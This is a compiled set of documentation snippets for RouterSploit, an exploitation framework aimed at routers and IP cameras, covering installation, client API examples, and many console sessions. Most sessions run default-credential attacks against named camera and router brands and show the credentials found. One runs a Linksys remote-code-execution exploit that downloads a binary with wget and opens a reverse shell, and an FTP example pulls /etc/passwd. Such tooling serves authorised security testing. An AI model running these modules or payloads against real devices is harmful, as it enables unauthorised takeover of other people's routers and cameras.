### HTTP Request Examples with HTTPClient
Source: https://context7.com/threat9/routersploit/llms.txt
Demonstrates various HTTP request methods (GET, POST), custom headers, basic authentication, and session management using HTTPClient. Ensure the target HTTP server is reachable before execution.
```python
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
import requests
class Exploit(HTTPClient):
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
# Test reachability
if not self.http_test_connect():
print_error("Target HTTP server is not reachable")
return
# GET request
response = self.http_request(method="GET", path="/config.cgi")
if response:
print_info(response.text)
# POST with form data
response = self.http_request(
method="POST",
path="/login.cgi",
data={"login": "admin", "password": "admin"},
)
if response and "login successful" in response.text:
print_success("Authenticated!")
# Custom headers
response = self.http_request(
method="POST",
path="/xml.cgi",
headers={"Content-Type": "text/xml", "X-Requested-With": "XMLHttpRequest"},
data="TEST",
)
# Basic auth
response = self.http_request(
method="GET",
path="/admin/",
auth=("admin", "admin"),
)
if response and response.status_code == 200:
print_success("Basic auth succeeded")
# Session / cookie persistence
session = requests.Session()
self.http_request(method="POST", path="/auth.php",
session=session, data={"user": "admin", "pass": "admin"})
# Subsequent requests in the same session carry the auth cookie automatically
response = self.http_request(method="GET", path="/dashboard", session=session)
# Build the full target URL
url = self.get_target_url(path="/cgi-bin/login.cgi")
print_info("Login URL: {}".format(url))
# Output: http://192.168.1.1:80/cgi-bin/login.cgi (or https:// when ssl=true)
```
--------------------------------
### FTPCli.connect Example
Source: https://github.com/threat9/routersploit/wiki/FTP-Client
Establishes a connection to the FTP server. The connection attempt can be retried a specified number of times.
```python
ftp_client = self.ftp_create()
if ftp_client.connect():
print_status("Connection was successful")
```
--------------------------------
### Run IQInvision Camera Default Telnet Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/iqinvision/telnet_default_creds.md
This example demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the default credential attack.
```bash
rsf > use creds/cameras/iqinvision/telnet_default_creds
rsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### FTPClient.ftp_create Example
Source: https://github.com/threat9/routersploit/wiki/FTP-Client
Use this method to create an FTPCli object for FTP communication. It accepts optional target IP and port parameters.
```python
ftp_client = self.ftp_create()
```
--------------------------------
### Example Exploit-DB Reference
Source: https://github.com/threat9/routersploit/wiki/Contribution-Guidelines
This is an example of a reference format for exploits found on Exploit-DB, useful when reporting issues or documenting findings.
```text
References:
- https://www.exploit-db.com/exploits/24975/
```
--------------------------------
### Run Honeywell Camera Telnet Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/honeywell/telnet_default_creds.md
This example demonstrates the command-line usage of the module. Set the target IP and run the module to initiate the default credentials attack.
```bash
rsf > use creds/cameras/honeywell/telnet_default_creds
rsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### FTPCli.login Example
Source: https://github.com/threat9/routersploit/wiki/FTP-Client
Logs into the FTP server using provided username and password. Authentication is required before performing other operations.
```python
ftp_client = self.ftp_create()
if ftp_client.connect():
if ftp_client.login("admin", "admin"):
print_success("Successful authentication to FTP server")
```
--------------------------------
### Run PFSense Router Telnet Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/pfsense/telnet_default_creds.md
This example demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the credential attack.
```bash
rsf > use creds/routers/pfsense/telnet_default_creds
rsf (PFSense Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (PFSense Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Run Basler Camera Telnet Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/basler/telnet_default_creds.md
This example demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the attack.
```bash
rsf > use creds/cameras/basler/telnet_default_creds
rsf (Basler Camera Telnet Default Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Basler Camera Telnet Default Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Example FTP Exploit
Source: https://github.com/threat9/routersploit/wiki/FTP-Client
This exploit demonstrates how to use the FTPClient to connect to a target FTP server, attempt to log in with default credentials, and handle connection or authentication failures.
```python
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient
class Exploit(FTPClient):
__info__ = {
"name": "Example FTP exploit",
"description": "FTP exploit description",
"authors": (
"John Smith",
),
"references": (
"https://www.threat9.com",
),
"devices": (
"D-Link Devices",
)
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(21, "Target FTP port")
def run(self):
ftp_client = self.ftp_create()
if ftp_client.connect():
if ftp_client.login("admin", "admin"):
print_info("Default credentials: admin/admin")
else:
print_error("Exploit failed - could not authenticate to FTP server")
ftp_client.close()
return
print_error("Exploit failed - could not connect to FTP server")
@mute
def check(self):
return None
```
--------------------------------
### Run Sentry360 Camera Telnet Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/sentry360/telnet_default_creds.md
This example demonstrates the command-line usage of the `creds/cameras/sentry360/telnet_default_creds` module within the Routersploit framework. It shows how to set the target IP address and execute the module to find default Telnet credentials.
```bash
rsf > use creds/cameras/sentry360/telnet_default_creds
rsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Run Zyxel SSH Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/zyxel/ssh_default_creds.md
This example demonstrates how to use the Zyxel SSH default credentials module. Set the target IP and run the module to check for default credentials.
```bash
rsf > use creds/routers/zyxel/ssh_default_creds
rsf (Zyxel Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Zyxel Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
--------------------------------
### Install RouterSploit on Ubuntu 18.04/17.10
Source: https://github.com/threat9/routersploit/wiki/Installation
Installs RouterSploit on Ubuntu systems. Includes adding the universe repository, installing pip, cloning the repository, and installing requirements.
```bash
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
python3 -m pip install -r requirements
python3 rsf.py
```
--------------------------------
### Run Mikrotik FTP Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/mikrotik/ftp_default_creds.md
This example demonstrates the command-line usage of the Mikrotik Router Default FTP Creds module. It shows how to select the module, set the target IP address, and execute the attack. The output displays the progress, authentication attempts, and any successfully found credentials.
```bash
rsf > use creds/routers/mikrotik/ftp_default_creds
rsf (Mikrotik Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
--------------------------------
### Install RouterSploit on Kali Linux
Source: https://github.com/threat9/routersploit/wiki/Installation
Installs RouterSploit and its dependencies on Kali Linux using apt and pip. Executes the framework after installation.
```bash
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
--------------------------------
### Install RouterSploit on OSX
Source: https://github.com/threat9/routersploit/blob/master/README.md
Installs RouterSploit and its dependencies on OSX.
```bash
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
```
--------------------------------
### Run Speco Camera SSH Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/speco/ssh_default_creds.md
This example demonstrates the command-line usage of the Speco Camera SSH Default Creds module. It shows how to select the module, set the target IP address, and run the attack. The output displays the progress and any successful credentials found.
```bash
rsf > use creds/cameras/speco/ssh_default_creds
rsf (Speco Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
--------------------------------
### Install Bluetooth Support on Kali Linux
Source: https://github.com/threat9/routersploit/wiki/Installation
Installs Bluetooth Low Energy support for RouterSploit on Kali Linux. Requires additional system packages and a pip install.
```bash
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
--------------------------------
### Install RouterSploit on macOS
Source: https://context7.com/threat9/routersploit/llms.txt
Installs RouterSploit on macOS, including dependencies and the framework itself.
```bash
# macOS
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
```
--------------------------------
### Arecont Camera FTP Default Creds Scenario
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/arecont/ftp_default_creds.md
This example demonstrates the command-line interaction for using the Arecont Camera FTP Default Creds module. It shows how to set the target, run the module, and interpret the output, including successful authentication.
```bash
rsf > use creds/cameras/arecont/ftp_default_creds
rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
--------------------------------
### Install RouterSploit via Docker
Source: https://context7.com/threat9/routersploit/llms.txt
Installs and runs RouterSploit using Docker Compose for containerized deployment.
```bash
# Docker
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker compose up --build -d
docker attach routersploit
```
--------------------------------
### Run Mikrotik Telnet Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/mikrotik/telnet_default_creds.md
This example demonstrates the command-line usage of the Mikrotik Router Default Telnet Creds module. It shows how to select the module, set the target IP address, and initiate the attack. The output displays the progress and results, including successful credential discovery.
```bash
rsf > use creds/routers/mikrotik/telnet_default_creds
rsf (Mikrotik Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Install RouterSploit on Kali/Ubuntu
Source: https://context7.com/threat9/routersploit/llms.txt
Installs RouterSploit on Kali Linux or Ubuntu 20.04, including dependencies and the framework itself.
```bash
# Kali Linux / Ubuntu 20.04
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
--------------------------------
### Install Bluetooth Low Energy Support
Source: https://context7.com/threat9/routersploit/llms.txt
Installs the necessary package for Bluetooth Low Energy support in RouterSploit.
```bash
# Optional: Bluetooth Low Energy support
apt-get install libglib2.0-dev
python3 -m pip install bluepy
```
--------------------------------
### Run Avtech Camera SSH Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/avtech/ssh_default_creds.md
This example demonstrates the command-line usage of the Avtech Camera SSH Default Creds module within the routersploit framework. It shows how to set the target IP address and execute the module to find default credentials.
```bash
rsf > use creds/cameras/avtech/ssh_default_creds
rsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
--------------------------------
### Run Avigilon Camera Telnet Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/avigilon/telnet_default_creds.md
This example demonstrates the command-line usage of the Avigilon Camera Default Telnet Creds module. It shows how to set the target IP address and execute the module to scan for default credentials.
```bash
rsf > use creds/cameras/avigilon/telnet_default_creds
rsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Run IQInvision Camera FTP Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/iqinvision/ftp_default_creds.md
Execute the module to scan for default FTP credentials on an IQInvision camera. Ensure the target IP address is set correctly before running.
```text
rsf > use creds/cameras/iqinvision/ftp_default_creds
rsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
--------------------------------
### Install RouterSploit on Ubuntu 20.04
Source: https://github.com/threat9/routersploit/blob/master/README.md
Installs RouterSploit and its dependencies on Ubuntu 20.04. Includes steps for Bluetooth Low Energy support.
```bash
sudo apt-get install git python3-pip
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
```bash
sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
--------------------------------
### Run Mobotix Camera Telnet Default Creds Attack
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/mobotix/telnet_default_creds.md
This example demonstrates the command-line usage of the Mobotix Camera Telnet Default Creds module. It shows how to set the target IP address and execute the attack to find default credentials.
```bash
rsf > use creds/cameras/mobotix/telnet_default_creds
rsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Install RouterSploit on Kali Linux
Source: https://github.com/threat9/routersploit/blob/master/README.md
Installs RouterSploit and its dependencies on Kali Linux. Includes steps for Bluetooth Low Energy support.
```bash
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
```bash
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
--------------------------------
### Running the GeoVision Camera SSH Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/geovision/ssh_default_creds.md
This example demonstrates the command-line interaction to use the GeoVision Camera Default SSH Creds module, set the target IP, and run the attack. It shows the expected output, including failed and successful authentication attempts, and the final display of found credentials.
```bash
rsf > use creds/cameras/geovision/ssh_default_creds
rsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
--------------------------------
### Install RouterSploit on Ubuntu 18.04 & 17.10
Source: https://github.com/threat9/routersploit/blob/master/README.md
Installs RouterSploit and its dependencies on Ubuntu 18.04 and 17.10. Includes steps for Bluetooth Low Energy support.
```bash
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
```
```bash
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
--------------------------------
### HTTPClient.http_request: Retrieve data with GET
Source: https://github.com/threat9/routersploit/wiki/HTTP-Client
Use this snippet to retrieve data from a specified path using the HTTP GET method. Ensure the path is correctly formatted.
```python
response = self.http_request(
method="GET",
path="/config.cgi",
)
if response:
print_info(response.text)
```
--------------------------------
### Run Vacron Camera Default Telnet Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/vacron/telnet_default_creds.md
This example demonstrates the command-line usage of the Vacron Camera Default Telnet Creds module within the routersploit framework. It shows how to set the target IP address and execute the module to find default credentials.
```bash
rsf > use creds/cameras/vacron/telnet_default_creds
rsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Run Mikrotik SSH Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/mikrotik/ssh_default_creds.md
This example demonstrates the command-line usage of the Mikrotik SSH default credentials module within the routersploit framework. It shows how to select the module, set the target IP address, and execute the attack, including sample output indicating successful and failed authentication attempts.
```bash
rsf > use creds/routers/mikrotik/ssh_default_creds
rsf (Mikrotik Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
--------------------------------
### SSHCli.interactive
Source: https://github.com/threat9/routersploit/wiki/SSH-Client
Starts an interactive session with the SSH server.
```APIDOC
## SSHCli.interactive
### Description
Starts an interactive session with the SSH server.
### Parameters
* None
### Response
* None
```
--------------------------------
### FTPCli.close Example
Source: https://github.com/threat9/routersploit/wiki/FTP-Client
Closes the active FTP connection. It's important to close the connection after completing operations to free up resources.
```python
ftp_client = self.ftp_create()
if ftp_client.connect():
print_status("Start to close connection")
ftp_client.close()
```
--------------------------------
### Exploit Module Usage
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/linksys/eseries_themoon_rce.md
Demonstrates the steps to use the exploit module, including setting the target, running the exploit, and configuring a reverse TCP payload.
```text
rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module...
[+] Target appears to be vulnerable
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload ' commands.
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture.
reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture.
cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options
Payload Options:
Name Current settings Description
---- ---------------- -----------
lhost Connect-back IP address
lport 5555 Connect-back TCP Port
cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
lhost => 192.168.1.4
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:41933
[+] Enjoy your shell
```
--------------------------------
### FTPCli.get_content Example
Source: https://github.com/threat9/routersploit/wiki/FTP-Client
Retrieves the content of a specified file from the remote FTP server. Ensure a connection and successful login before calling this method.
```python
ftp_client = self.ftp_create()
if ftp_client.connect():
print_status("Connection to FTP server was successful")
response = ftp_client.get_content("/etc/passwd")
if response:
print_status("Downloaded /etc/passwd from remote server")
print_info(response)
```
--------------------------------
### Run Speco Camera Telnet Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/speco/telnet_default_creds.md
Demonstrates the command-line usage of the Speco Camera Telnet Default Creds module. Set the target IP and run the module to initiate the dictionary attack.
```bash
rsf > use creds/cameras/speco/telnet_default_creds
rsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
--------------------------------
### Run IQInvision Camera SSH Default Creds Module
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/iqinvision/ssh_default_creds.md
This snippet demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the attack.
```bash
rsf > use creds/cameras/iqinvision/ssh_default_creds
rsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
